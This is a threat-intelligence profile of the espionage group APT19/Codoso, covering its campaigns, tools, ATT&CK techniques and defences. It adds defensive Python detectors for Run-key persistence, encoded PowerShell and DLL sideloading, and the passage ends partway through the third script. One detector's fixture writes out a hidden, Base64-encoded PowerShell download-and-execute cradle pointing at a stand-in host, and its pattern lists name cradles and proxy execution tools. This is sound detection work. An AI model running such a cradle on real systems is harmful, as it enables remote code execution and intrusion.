APT19 / Codoso
A Chinese espionage group assessed to operate through freelance contractors with state sponsorship, targeting legal, financial, and defense sectors with unusual precision. Notable for a 2015 watering hole attack via Forbes.com using chained zero-days, and a 2017 phishing campaign targeting seven law and investment firms simultaneously. Blends custom Derusbi backdoors with commodity tools like Cobalt Strike and Empire in a way that deliberately complicates attribution — and has been active since at least 2010 when it compromised the Nobel Peace Prize website to target Chinese dissidents.
Overview
APT19 — tracked as Codoso and C0d0so0 by Palo Alto Networks and iSIGHT Partners (acquired by FireEye in 2017), Sunshop Group by FireEye, Bronze Firestone by SecureWorks, and Checkered Typhoon (also Chlorine) by Microsoft — is a Chinese cyber espionage group that has operated since at least 2010. Note that Microsoft's name SCANDIUM refers to APT18 (Dynamite Panda / Wekby), a separate group — the two are occasionally confused in open-source reporting. APT19 is distinct from the predominantly PLA-affiliated groups that dominate China's documented APT landscape; it is assessed to operate through a freelance contractor model with some level of Chinese state sponsorship — making it MSS-adjacent rather than a directly embedded military or intelligence unit. This structure has tactical implications: the group demonstrates more flexible, entrepreneurial operational behavior than rigidly structured PLA units, blending custom malware with commodity offensive security tools in a way that makes clean attribution genuinely difficult.
APT19's earliest documented activity is a 2010 compromise of the Nobel Peace Prize website. Shortly after the 2010 Nobel Peace Prize was awarded to Chinese dissident Liu Xiaobo — a decision that infuriated the Chinese government — APT19 compromised the Nobel committee's web properties and served zero-day exploits to visitors via a Firefox browser vulnerability. The targeting was narrow and deliberate: the attackers were not seeking broad infection but intelligence on the individuals and organizations monitoring or celebrating the dissident's recognition. This political targeting alongside economic espionage — a dual mandate — has characterized the group ever since.
APT19 came to wide industry attention in late 2014 when iSIGHT Partners and Invincea documented that the group had compromised Forbes.com's "Thought of the Day" widget — a Flash-based element loaded by millions of visitors — and used it as a delivery platform for a chained zero-day attack that exploited both an Adobe Flash vulnerability and a Microsoft ASLR bypass in Internet Explorer. The attack was selective: despite Forbes being one of the 60 most-visited websites in the world at the time, the exploit was served only to visitors fitting a specific target profile, primarily in the defense sector and financial services. Attackers were not indiscriminately infecting visitors — they were hunting specific organizations whose personnel happened to visit Forbes.
The group's 2017 law firm campaign — documented by Mandiant in June 2017 — demonstrated both longevity and adaptability. APT19 targeted seven law and investment firms with three sequentially deployed techniques: RTF documents exploiting CVE-2017-0199, macro-enabled Excel (XLSM) documents that bypassed application whitelisting, and Cobalt Strike Beacon payloads. The campaign reflected a group that monitors defensive technology and pivots delivery mechanisms when initial approaches are detected — cycling through three distinct techniques over a single month-long operation.
The relationship between APT19 and Deep Panda is genuinely contested. MITRE ATT&CK notes that some analysts treat them as the same group; others — including iSIGHT — assessed them as distinct groups that share tools (particularly Derusbi) and may share resources but operate independently. The freelancer model means the same individual operators or tool developers may appear in both activity clusters. This profile treats APT19 as a distinct operational cluster while noting that tool overlap with Deep Panda is documented and real. No DOJ indictment has been filed against specific APT19 members.
Target Profile
APT19's targeting is defined by a striking interest in the intermediaries of sensitive information — law firms, investment banks, and advisors who hold privileged access to the proprietary data of primary targets — rather than attacking those primary targets directly. This represents a sophisticated intelligence tradecraft insight: it is often easier and more productive to compromise the lawyer reviewing an M&A deal than to breach the company being acquired. The group complements this with traditional defense and technology IP theft and a consistent political mandate targeting Chinese dissidents.
- Legal Services: The highest-profile documented targeting sector. Law firms handling mergers and acquisitions, trade secret litigation, government contracts, and intellectual property work hold enormous quantities of sensitive client data — often including the proprietary information of companies that would otherwise be very difficult to breach directly. APT19's 2017 campaign simultaneously targeted seven law and investment firms, reflecting a systematic approach to this supply-chain espionage model.
- Financial and Investment Services: Investment banks, hedge funds, private equity firms, and economic advisory organizations are targeted for M&A intelligence, market-moving proprietary analysis, and strategic economic forecasting. Mandiant noted prior observations of APT19 stealing data from law and investment firms for competitive economic purposes, suggesting stolen intelligence is used to advantage Chinese state-owned enterprises in competitive negotiations and transactions.
- Defense and Aerospace: Defense contractors, defense industry consultants, and aerospace firms are consistently targeted for weapons system specifications, procurement intelligence, and technology blueprints. The 2014 Forbes watering hole specifically targeted defense sector visitors — consistent with Chinese state interest in advancing PLA capabilities through stolen Western defense research.
- High Technology and Telecommunications: APT19's 2016 campaign documented by Palo Alto Unit 42 targeted telecommunications, high-tech, and manufacturing organizations. Technology firms are targeted both for their own IP and as access vectors to clients and partners in higher-value sectors.
- Political Dissidents and Think Tanks: The Nobel Peace Prize compromise and Department of Labor breach both reflect a political intelligence mandate alongside economic espionage — consistent with the MSS's responsibility for monitoring Chinese diaspora, dissidents, and foreign organizations that advocate on China-sensitive issues. Global think tanks working on China policy, Taiwan, Tibet, and Xinjiang are documented Codoso targets.
- Energy, Pharmaceutical, and Manufacturing: Broader economic espionage targets consistent with Chinese Five Year Plan industrial priorities, documented across multiple APT19 campaign generations.
Tactics, Techniques & Procedures
APT19's technique footprint spans the full attack lifecycle. A notable characteristic is the group's deliberate blending of custom and commodity tools — pairing the bespoke Derusbi backdoor with widely available offensive security frameworks like Cobalt Strike and Empire. This makes individual tool detections less reliable as attribution anchors and forces defenders toward behavioral detection. The group also demonstrates a willingness to pivot delivery mechanisms mid-campaign when initial approaches fail, cycling through three distinct techniques in its 2017 law firm operation within a single month.
| MITRE ID | Technique | Description |
|---|---|---|
| T1189 | Drive-by Compromise (Watering Hole) | APT19's signature initial access technique, documented in campaigns from 2010 through 2015. The group compromises high-traffic, reputable websites that its target audience is likely to visit — the Nobel Peace Prize site (2010, targeting dissident-adjacent visitors), the U.S. Department of Labor (2013, targeting workers' compensation and government benefit recipients), and Forbes.com (2014, targeting financial services and defense sector professionals). The group then selectively delivers exploits only to visitors matching a specific target profile, rather than broadly infecting all visitors — demonstrating intelligence on who reads which sites. |
| T1566.001 | Spear-Phishing Attachment | Used extensively in post-2015 campaigns when watering hole infrastructure became harder to maintain undetected. The 2017 law firm campaign used RTF documents (exploiting CVE-2017-0199) and macro-enabled XLSM spreadsheets. Lures impersonated legal correspondence and business-relevant documents — sophisticated enough that Mandiant published a specific advisory to law and investment firms about the campaign. |
| T1203 | Exploitation for Client Execution | The Forbes watering hole exploited a chained combination of an Adobe Flash zero-day and a Microsoft Internet Explorer ASLR bypass zero-day — two previously unknown vulnerabilities used together to defeat a key memory randomization defense. This chained zero-day approach was assessed by iSIGHT as technically sophisticated and distinct from typical criminal activity. CVE-2017-0199 (Microsoft Office HTA handler vulnerability) was used in the 2017 law firm RTF phishing campaign. |
| T1574.001 | DLL Search Order Hijacking | APT19 used a legitimate executable — in one documented case a McAfee application — to side-load a malicious DLL containing the HTTP and Port 22 Derusbi variants. This technique abuses the Windows DLL search path to cause a trusted application to load an attacker-controlled library, effectively masking the malicious process behind a signed, legitimate binary. |
| T1059.001 | PowerShell | APT19 used obfuscated PowerShell from the Empire framework, passing -W Hidden (the WindowStyle parameter) to suppress visible PowerShell windows. Base64 encoding of PowerShell commands was used consistently as command obfuscation. In the 2017 XLSM campaign, Excel macro execution launched PowerShell to download and execute subsequent stages, bypassing application whitelisting controls that permit Office macro execution. |
| T1055 | Process Injection | Derusbi uses process injection to execute within the context of a legitimate running process, reducing the forensic footprint of the backdoor and evading process-based detection tools that would flag a standalone malicious process. Campaign-specific Derusbi builds are compiled for individual operations and injected post-exploitation. |
| T1547.001 | Registry Run Keys | Derusbi establishes persistence via Registry Run keys when running without administrator privileges — writing the backdoor path under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. When administrator privileges are available, it installs as a Windows service for more robust persistence that survives standard user-level security tooling. |
| T1505.003 | Web Shell | China Chopper web shells are deployed on internet-facing web servers following exploitation, providing a persistent, lightweight command interface accessible via HTTP. Web shells require no outbound C2 connection — they receive commands via inbound HTTP requests — making them harder to detect through outbound traffic monitoring and difficult to fully eradicate if the underlying web vulnerability is not also patched. |
| T1071.001 | Web Protocols (HTTP C2) | Multiple Derusbi variants communicate over HTTP. The HTTP variant uses standard web protocol traffic to blend with normal enterprise web activity. The C0d0so0 custom backdoor also supports HTTP C2 with compressed and encoded network traffic to resist inspection. Derusbi communicates over SSL in some configurations, requiring TLS inspection to detect. |
| T1027.010 | Command Obfuscation (Base64) | PowerShell commands are Base64-encoded consistently across documented APT19 campaigns. Combined with the -W Hidden parameter to suppress visible execution windows, encoded PowerShell commands execute silently and resist pattern-based detection rules that look for plaintext PowerShell command strings. |
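The Registry Run-key persistence described in the T1547.001 row above is one of the few APT19 behaviors that can be checked directly against endpoint telemetry. The following Python script is an added example written for this profile, not code from any of the vendor reports the page cites; it runs over a handful of constructed Sysmon Event ID 13 (registry value set) records and flags Run/RunOnce values that point at user-writable locations, that proxy execution through hosts such as rundll32, or that were written by a process itself running from a user-writable directory. Only the Sysmon field names are real; the paths, SID and value names are invented.

```python
import re
from dataclasses import dataclass

# Constructed Sysmon Event ID 13 (RegistryEvent: Value Set) records. The paths, SID and
# value names are invented for this example; only the field names (Image, TargetObject,
# Details) follow Sysmon's real schema.
SAMPLE_REGISTRY_EVENTS = [
    {"EventID": 13,
     "Image": r"C:\Users\alice\AppData\Local\Temp\svchost.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate",
     "Details": r"C:\Users\alice\AppData\Local\Temp\svchost.exe"},
    {"EventID": 13,
     "Image": r"C:\Windows\regedit.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "Details": r"C:\Windows\System32\SecurityHealthSystray.exe"},
    {"EventID": 13,
     "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Loader",
     "Details": r'rundll32.exe "C:\Users\Public\Libraries\update.dll",Start'},
    {"EventID": 13,
     "Image": r"C:\Program Files\Example Vendor\setup.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "Details": r'"C:\Program Files\Example Vendor\tray.exe" /background'},
    {"EventID": 13,
     "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
]

# Run / RunOnce under either hive. Sysmon records HKCU writes as HKU\<SID>\..., so the
# user scope is recognised by the HKU prefix rather than by the literal "HKCU".
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
# Locations an unprivileged user can write to; a Run value pointing here needed no admin rights.
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData|Downloads)\\", re.I)
# Windows paths inside a command line, quoted ("C:\Program Files\x.exe") or bare (C:\x\y.exe).
WIN_PATH_RE = re.compile(r'"([A-Za-z]:\\[^"]+)"|([A-Za-z]:\\[^\s",]+)')
# Hosts that execute someone else's code: the real payload is in the argument, not the image.
PROXY_HOSTS = ("rundll32", "regsvr32", "mshta", "wscript", "cscript", "powershell", "cmd")


@dataclass
class Finding:
    value_name: str
    scope: str        # "user" (HKU/HKCU) or "machine" (HKLM)
    command: str
    reasons: list


def autostart_scope(target_object):
    """Return 'user' or 'machine' for a Run/RunOnce value path, None for any other key."""
    if not RUN_KEY_RE.search(target_object):
        return None
    hive = target_object.split("\\", 1)[0].upper()
    return "machine" if hive == "HKLM" else "user"


def paths_in(command):
    """Every Windows path referenced by a Run value's command line."""
    return [quoted or bare for quoted, bare in WIN_PATH_RE.findall(command)]


def assess_run_value(event):
    """Return a Finding for a suspicious Run/RunOnce write, or None if nothing stands out."""
    scope = autostart_scope(event["TargetObject"])
    if scope is None:
        return None
    command = event["Details"]
    reasons = []
    if any(USER_WRITABLE_RE.search(p) for p in paths_in(command)):
        reasons.append("target_in_user_writable_dir")
    # First token of the command line (quoted or bare), reduced to its file name.
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', command)
    launcher = ((m.group(1) or m.group(2)) if m else "").rsplit("\\", 1)[-1].lower()
    if launcher.split(".")[0] in PROXY_HOSTS:
        reasons.append("execution_via_proxy_host")
    if USER_WRITABLE_RE.search(event["Image"]):
        reasons.append("written_by_process_in_user_writable_dir")
    if not reasons:
        return None
    return Finding(event["TargetObject"].rsplit("\\", 1)[-1], scope, command, reasons)


def scan_registry_events(events):
    """Assess every Event ID 13 record and collect the findings in input order."""
    return [f for f in (assess_run_value(e) for e in events if e.get("EventID") == 13) if f]


if __name__ == "__main__":
    for f in scan_registry_events(SAMPLE_REGISTRY_EVENTS):
        print(f"[{f.scope}] {f.value_name}: {f.command}  <- {', '.join(f.reasons)}")
```

The user-scope branch is the one that matters for this group: Derusbi falls back to an HKCU Run value only when it lacks administrator rights, so a user-scope value pointing into AppData or Temp is the low-privilege form of its persistence, while the privileged form (a service install) surfaces as registry writes under HKLM\SYSTEM\CurrentControlSet\Services and needs its own rule.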
Known Campaigns
APT19's campaign history spans from politically motivated dissident surveillance in 2010 through sustained economic espionage focused on legal and financial sectors. The group's watering hole operations show a consistent and sophisticated pattern: compromising sites of strategic audience value rather than maximum reach, then delivering exploits selectively to visitors matching an intelligence-driven target profile.
This is APT19's earliest documented operation. Shortly after the 2010 Nobel Peace Prize was awarded to incarcerated Chinese dissident Liu Xiaobo, a decision that prompted intense protest from the Chinese government, APT19 compromised the Nobel committee's web properties and embedded a zero-day exploit for the Firefox browser to serve malicious code to selected visitors. The targeting was narrow: the group was specifically interested in individuals and organizations monitoring, celebrating, or advocating for the dissident, consistent with a political intelligence mandate rather than purely commercial espionage. This campaign established the group's founding pattern of using trusted, high-credibility websites as selective-delivery exploit platforms rather than broad-infection malvertising.
In March 2013, CrowdStrike identified a strategic web compromise on a U.S. Department of Labor website. The compromised page redirected selected visitors to attacker infrastructure. Eight additional compromised sites were identified in the same campaign, suggesting coordinated infrastructure. The Department of Labor targeting was likely designed to reach government employees, defense industry workers, and individuals filing workers' compensation or benefit claims — consistent with a data collection effort targeting U.S. government workforce intelligence. FireEye publicly identified the group behind these watering hole operations as the Sunshop Group — the same cluster later designated APT19 — in 2013.
APT19's most technically documented campaign. From November 28 to December 1, 2014, the group compromised Forbes.com's "Thought of the Day" widget — a Flash-based feature loaded by every visitor to the site — and used it as the delivery platform for a chained zero-day exploit. The Flash component exploited CVE-2014-9163 (Adobe Flash Player buffer overflow, patched December 9, 2014); the Internet Explorer component exploited CVE-2015-0071 (IE ASLR bypass, patched February 10, 2015 Patch Tuesday). Chaining both allowed attackers to defeat ASLR memory protection that would have blocked the Flash exploit alone. iSIGHT Partners described the chained zero-day as a "unicorn" in the cyber threat landscape — the best-known prior example being Stuxnet. Despite Forbes being ranked by Alexa as the 61st most popular website globally, the exploit was delivered only to visitors fitting a specific target profile — primarily defense sector firms and financial services organizations, plus Chinese dissident-adjacent groups. Invincea first detected the campaign through a defense industrial base customer who noticed unusual behavior. iSIGHT Partners attributed the campaign to Codoso Team in their February 2015 report. Forbes was notified and took immediate action on December 1 when the compromise was identified. The Derusbi malware family was used as the post-exploitation implant, with C2 infrastructure tied to a domain previously associated with Codoso operations. iSIGHT and Invincea note that malware resources written in Simplified Chinese bore a resemblance to Derusbi variants unique to Chinese cyber espionage operators.
This campaign was documented by Palo Alto Networks Unit 42 in January 2016. Following the Forbes exposure, APT19 returned with new custom malware variants, an HTTP variant and a Port 22 variant, that shared structural similarities with Derusbi but did not match any known malware family at the time of discovery. The group used DLL sideloading via a legitimate McAfee application to launch the malware. Newly targeted sectors included telecommunications, high technology, education, manufacturing, and legal services, an expansion from the primarily defense and finance focus of earlier campaigns. Both malware variants were compiled within days of observed attacks, consistent with per-campaign custom build procedures documented across APT19's Derusbi generations.
Mandiant documented this campaign in June 2017 under the title "Privileges and Credentials: Phished at the Request of Counsel." APT19 simultaneously targeted seven law and investment firms using three sequentially deployed techniques within a single campaign window. In early May 2017, the group sent phishing emails with RTF attachments exploiting CVE-2017-0199 (a Microsoft Windows HTA handler vulnerability enabling remote code execution via malicious Office documents). Toward the end of May, APT19 switched to macro-enabled Excel (XLSM) documents, including an application whitelisting bypass technique embedded in the macros. At least one observed phishing lure delivered a Cobalt Strike Beacon payload. Mandiant could not attribute post-exploitation activity at the time of publication but noted prior observations of APT19 stealing data from law and investment firms for competitive economic purposes. The campaign demonstrated deliberate targeting of legal and financial sector supply chains and a willingness to rapidly pivot delivery mechanisms when defenses respond.
Tools & Malware
APT19's toolset is deliberately mixed. Custom-built backdoors like Derusbi provide sophisticated, campaign-tailored capability; commodity frameworks like Cobalt Strike and Empire provide operational flexibility and complicate attribution. The group's access to Derusbi source code — evidenced by the deployment of modified versions immediately after previous versions were removed from compromised hosts — indicates a developer relationship with that malware family, not merely use of a shared tool.
- Derusbi (PHOTO): APT19's primary custom backdoor, and the tool most closely associated with the group across all documented campaign generations. Modular in design — additional plugins can be loaded at runtime without a full reimplant, extending capability while minimizing the forensic footprint of the core implant. Supports file transfer, command execution, screen capture, keylogging, and network proxying. Communicates over SSL in some configurations — making it invisible to inspection tools that cannot perform TLS termination. APT19 appears to have access to Derusbi's source code, as modified versions are deployed quickly after previous versions are identified and removed. Two documented variants: HTTP variant (communicates over standard web protocol) and Port 22 variant (disguised to resemble SSH traffic).
- Cobalt Strike Beacon: A commercial offensive security framework used by APT19 as a post-exploitation payload, first documented in the 2017 law firm campaign. Beacon provides flexible C2 over HTTP, HTTPS, DNS, or SMB; in-memory execution to avoid writing payloads to disk; and an extensible post-exploitation toolkit including credential dumping, lateral movement, and data staging. Use of a commercial tool complicates attribution — Cobalt Strike is used by dozens of threat actors globally — and requires defenders to distinguish APT19 Beacon deployments from other actors through infrastructure and behavioral correlation.
- Empire (PowerShell Framework): An open-source PowerShell post-exploitation framework used by APT19 for command execution and persistence. APT19 concealed Empire's PowerShell invocations using the -W Hidden window style parameter and Base64 encoding for obfuscation. Empire's use is detected behaviorally via anomalous PowerShell execution patterns rather than specific signatures.
- C0d0so0 Custom Backdoors (HTTP and Port 22 variants): Two custom malware variants documented by Palo Alto Unit 42 in 2016, structurally similar to Derusbi but sufficiently distinct to be treated as a separate family at time of discovery. Delivered via DLL sideloading through a legitimate McAfee executable. Compress and encode network traffic. Compiled campaign-specifically, with compile timestamps within days of observed deployments. The Port 22 variant is designed to masquerade as SSH traffic, complicating port-based filtering.
- China Chopper: A minimal web shell used for persistent access on compromised internet-facing servers. Receives commands via inbound HTTP POST requests, eliminating the need for outbound C2 connections — making it invisible to outbound traffic monitoring. China Chopper's tiny code footprint (the client component is trivially small) makes it easy to plant and difficult to reliably detect through file scanning alone.
- 9002 RAT (NAID): A Chinese RAT shared across multiple APT groups within the broader Chinese espionage ecosystem. Provides remote access for surveillance and data collection. Noted in Bronze Firestone/APT19 intrusion sets alongside Derusbi.
- PlugX: A widely-used modular Chinese APT RAT deployed by APT19 in some campaigns, providing a plugin-extensible persistent access framework. Its prevalence across Chinese APT groups makes it a weaker attribution signal but still a contextually relevant indicator when found alongside Derusbi or other APT19-specific tooling.
- EvilGrab RAT: A RAT enabling webcam access, file theft, and screen capture, documented in association with the APT19 / Deep Panda cluster. Provides surveillance capability beyond standard file exfiltration — collecting audio/video intelligence from compromised endpoints.
- FormerFirstRAT: A remote access tool documented in the APT19 / Bronze Firestone intrusion set, used to maintain persistent access within compromised environments after initial staging tools have been replaced or cleaned. Provides a secondary persistence channel independent of Derusbi.
- Fire Chili: A stealthy rootkit signed with legitimate digital certificates, documented by SecureWorks in the Bronze Firestone/APT19 intrusion set. Used to bypass detection mechanisms and maintain kernel-level access — the legitimate code signing certificate makes it significantly harder for standard security products to flag the rootkit as malicious.
- Zuguo (Chinoxy): A backdoor documented in the Bronze Firestone toolset providing persistent remote access. Used alongside Derusbi and 9002 RAT as part of APT19's multi-implant persistence strategy, ensuring access is maintained even if one implant is identified and removed.
- Alice's Rabbit Hole (MadHatter): A loader/dropper documented in the Bronze Firestone / APT19 intrusion set. Used as a staging tool to download and execute subsequent payloads, maintaining a separation between the delivery mechanism and the persistent implant to complicate forensic reconstruction of the full attack chain.
Indicators of Compromise
The following IOCs are drawn from Palo Alto Unit 42's C0d0so0 analysis (2016), Mandiant's law firm campaign disclosure (2017), and iSIGHT's Codoso/Forbes reporting (2015). Current APT19 infrastructure will be entirely different — behavioral indicators are the durable detection anchors.
APT19 infrastructure is refreshed between campaigns. Specific domain and IP IOCs from 2014–2017 are historical reference only. Derusbi SSL C2 traffic is invisible without TLS inspection — behavioral and host-based indicators are significantly more reliable than network blocklists for this group.
Mitigation & Defense
APT19 is assessed as active. Law firms, investment banks, and professional services organizations working in M&A, trade secrets, defense contracting, and China-related advisory are the highest-risk sectors. The group's blend of custom and commodity tooling means no single detection approach is sufficient — defenders need layered controls spanning email, endpoint, network, and TLS inspection.
- Law Firm and Professional Services Email Hardening: APT19's 2017 campaign directly targeted legal correspondence as a lure. Law firms and investment advisors should implement email sandboxing with document detonation, enforce strict macro execution policies across all Office applications (disable macros from external sources entirely, or restrict to digitally signed macros from trusted publishers), and train personnel to verify unusual document requests even when they appear to come from legitimate client or counterparty email addresses.
- CVE-2017-0199 Patching: RTF documents exploiting this HTA handler vulnerability remain a documented APT19 delivery vehicle. Verify that MS17-023 is applied across all Windows systems and all versions of Microsoft Office. Consider disabling OLE object activation in Registry policy for environments where it has no legitimate use — many enterprises can safely block HTA execution entirely.
- TLS Inspection: Derusbi communicates over SSL in some configurations, making it entirely invisible to network monitoring tools that do not perform TLS termination and inspection. Deploy a forward proxy with TLS inspection for all outbound enterprise HTTPS traffic. This is also the most effective control for detecting Cobalt Strike Beacon's HTTPS C2 channel, a secondary APT19 tool. Certificate pinning and anomalous certificate detection can complement full TLS inspection where performance constraints apply.
- PowerShell Constrained Language Mode and Script Block Logging: APT19's use of the Empire framework relies on PowerShell execution. Enable PowerShell Script Block Logging and Module Logging across all endpoints; these controls record the executed PowerShell commands even when they were passed Base64-encoded, providing visibility into obfuscated execution. Enforce PowerShell Constrained Language Mode to limit what PowerShell sessions can do unless the user holds elevated privileges.
- DLL Sideloading Prevention: APT19 sideloads malicious DLLs through signed legitimate applications. Implement application control policies (AppLocker or Windows Defender Application Control) that whitelist specific DLL files permitted to load from application directories, alerting on DLL loads from unexpected paths. Monitor for known legitimate executables (McAfee, Juniper VPN client, Adobe Reader, Microsoft ActiveX components) spawning unexpected child processes or loading DLLs from unusual locations.
- Watering Hole Detection: APT19 compromises legitimate, reputable websites frequented by its target audiences. Standard URL reputation blocklists are ineffective because the sites are genuinely reputable. Focus instead on behavioral detection: anomalous JavaScript execution in browser contexts, unexpected Flash plugin activity (Flash is retired — any Flash execution is now inherently suspicious), and drive-by download indicators on enterprise endpoints visiting external sites. Browser isolation solutions eliminate the watering hole vector entirely for high-risk user populations.
- Supply Chain Awareness for Legal and Financial Services: APT19's targeting of law firms as a pathway to their clients means organizations in defense, technology, and finance should include their legal counsel in their threat model. Discuss cybersecurity requirements with law firms handling sensitive work; consider encrypting all privileged attorney-client communications at the document level; and be aware that breach of your legal advisors may result in exposure of your own proprietary information without your own systems being directly compromised.
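The PowerShell rows in the technique table (T1059.001 and T1027.010) and the Script Block Logging item above turn on the same question: what is actually inside a Base64-encoded, hidden-window PowerShell invocation? The following Python script is an added example written for this profile, not code from Empire, Mandiant or any other source the page cites. It parses constructed process-creation command lines (the CommandLine field of Sysmon Event ID 1 or Security Event 4688), resolves powershell.exe's abbreviated switches (-W, -Enc, -ec, -NoP, -NonI) to their documented full names, decodes any -EncodedCommand argument from its UTF-16LE Base64 form, and scores what it finds. The sample command lines are invented; 203.0.113.10 is an RFC 5737 documentation address, not real infrastructure.

```python
import base64
import re


def encode_ps(script):
    """Encode a script the way powershell.exe expects for -EncodedCommand (Base64 of UTF-16LE).
    Used here only to build the constructed fixture below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation command lines. The first mimics an Empire-style launcher with
# the -W Hidden and Base64 obfuscation described in the profile; 203.0.113.10 is a documentation
# address. The rest are benign or non-PowerShell controls.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoP -NonI -W Hidden -Enc "
    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage')"),
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ec "
    + encode_ps(r"Get-Process | Out-File C:\Temp\procs.txt"),
    r"C:\Windows\System32\cmd.exe /c dir C:\Users",
]

# (full parameter name, shortest prefix powershell.exe accepts, extra documented aliases), per
# powershell.exe /?. Prefix matching is what keeps -W, -Win, -WindowStyle and -e, -enc all in scope.
PARAMS = [
    ("encodedcommand", 1, {"ec"}),
    ("windowstyle", 1, set()),
    ("noninteractive", 4, set()),
    ("noprofile", 3, set()),
    ("executionpolicy", 2, {"ep"}),
]
# A switch and its optional argument; the lookahead stops "-NoP -NonI" treating -NonI as an argument.
TOKEN_RE = re.compile(r'(?:^|\s)[-/]([A-Za-z]+)(?:\s+(?!-)("[^"]*"|\S+))?')
# Download-and-execute constructs commonly seen in the decoded stage of framework launchers.
CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|"
                       r"\biex\b|invoke-expression|frombase64string", re.I)
WEIGHTS = {"encoded_command": 2, "hidden_window": 2, "download_cradle": 3,
           "non_interactive": 1, "no_profile": 1, "execution_policy_bypass": 1,
           "undecodable_encoded_command": 2}


def is_powershell(cmdline):
    """True when the image (quoted or bare first token) is powershell.exe or pwsh.exe."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    exe = ((m.group(1) or m.group(2)) if m else "").rsplit("\\", 1)[-1].lower()
    return exe in ("powershell.exe", "powershell", "pwsh.exe", "pwsh")


def canonical_param(token):
    """Map an abbreviated switch such as 'w' or 'enc' to its full parameter name, or None."""
    t = token.lower()
    for full, min_len, aliases in PARAMS:
        if t in aliases or (len(t) >= min_len and full.startswith(t)):
            return full
    return None


def decode_encoded_command(blob):
    """Recover the script text from an -EncodedCommand argument; None if it is not valid."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_powershell(cmdline):
    """Return {"indicators", "score", "decoded"} for a PowerShell command line, None otherwise."""
    if not is_powershell(cmdline):
        return None
    indicators, decoded = [], None
    for token, arg in TOKEN_RE.findall(cmdline):
        param, arg = canonical_param(token), arg.strip('"')
        if param == "encodedcommand" and arg:
            decoded = decode_encoded_command(arg)
            indicators.append("encoded_command" if decoded is not None else "undecodable_encoded_command")
        elif param == "windowstyle" and arg.lower() in ("hidden", "1"):
            indicators.append("hidden_window")
        elif param == "noninteractive":
            indicators.append("non_interactive")
        elif param == "noprofile":
            indicators.append("no_profile")
        elif param == "executionpolicy" and arg.lower() == "bypass":
            indicators.append("execution_policy_bypass")
    # With Script Block Logging on, Event ID 4104 already carries this decoded text; decoding
    # here lets the same cradle check run on plain process-creation logs.
    if decoded and CRADLE_RE.search(decoded):
        indicators.append("download_cradle")
    return {"indicators": indicators, "score": sum(WEIGHTS[i] for i in indicators), "decoded": decoded}


def scan_command_lines(cmdlines, threshold=4):
    """Return the command lines whose combined indicator weight reaches the threshold."""
    hits = []
    for c in cmdlines:
        r = analyze_powershell(c)
        if r and r["score"] >= threshold:
            hits.append({"cmdline": c, **r})
    return hits


if __name__ == "__main__":
    for h in scan_command_lines(SAMPLE_COMMAND_LINES):
        print(h["score"], h["indicators"], "->", h["decoded"])
```

The threshold keeps a lone -ExecutionPolicy Bypass or a decoded-but-harmless encoded command below the alert line while an Empire-style launcher (no profile, non-interactive, hidden window, encoded, download cradle) scores well above it; tune the weights against your own administrative scripts before relying on the score, since scheduled tasks and management agents routinely use -NoP and -NonI legitimately.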
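The DLL sideloading described for the C0d0so0 variants (T1574.001) and in the DLL Sideloading Prevention item above can be checked against image-load telemetry. The following Python script is an added example written for this profile, not code from Unit 42, SecureWorks or any other cited source. It runs over constructed Sysmon Event ID 7 (Image Loaded) records, whose Signed/Signature/SignatureStatus fields describe the loaded DLL, joins them with the signer of the host process (which Sysmon records in that process's Event ID 1, modelled here as a lookup table), and flags the combinations that characterise sideloading: an unsigned DLL inside a signed process, a DLL carrying a System32 file name but loading from elsewhere, and a signed host running from a user-writable directory. "Example Vendor" and every path are invented, and the short SYSTEM_DLL_NAMES set is an assumption to be rebuilt from a golden image of your own Windows build.

```python
import re

# Signer of each host process as recorded in its Sysmon Event ID 1 (Process Create) record,
# modelled here as a lookup keyed by image path. "Example Vendor Inc." is invented.
HOST_SIGNERS = {
    r"C:\Users\bob\AppData\Local\Temp\VendorUpdater.exe": "Example Vendor Inc.",
    r"C:\Program Files\Example Vendor\VendorUpdater.exe": "Example Vendor Inc.",
}

# Constructed Sysmon Event ID 7 (Image Loaded) records. In this event the signature fields
# describe ImageLoaded (the DLL), not the process. Paths and names are invented.
SAMPLE_IMAGE_LOADS = [
    {"Image": r"C:\Users\bob\AppData\Local\Temp\VendorUpdater.exe",
     "ImageLoaded": r"C:\Users\bob\AppData\Local\Temp\version.dll",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
    {"Image": r"C:\Program Files\Example Vendor\VendorUpdater.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"Image": r"C:\Program Files\Example Vendor\VendorUpdater.exe",
     "ImageLoaded": r"C:\Program Files\Example Vendor\helper.dll",
     "Signed": "true", "Signature": "Example Vendor Inc.", "SignatureStatus": "Valid"},
    {"Image": r"C:\Program Files\Example Vendor\VendorUpdater.exe",
     "ImageLoaded": r"C:\Program Files\Example Vendor\dbghelp.dll",
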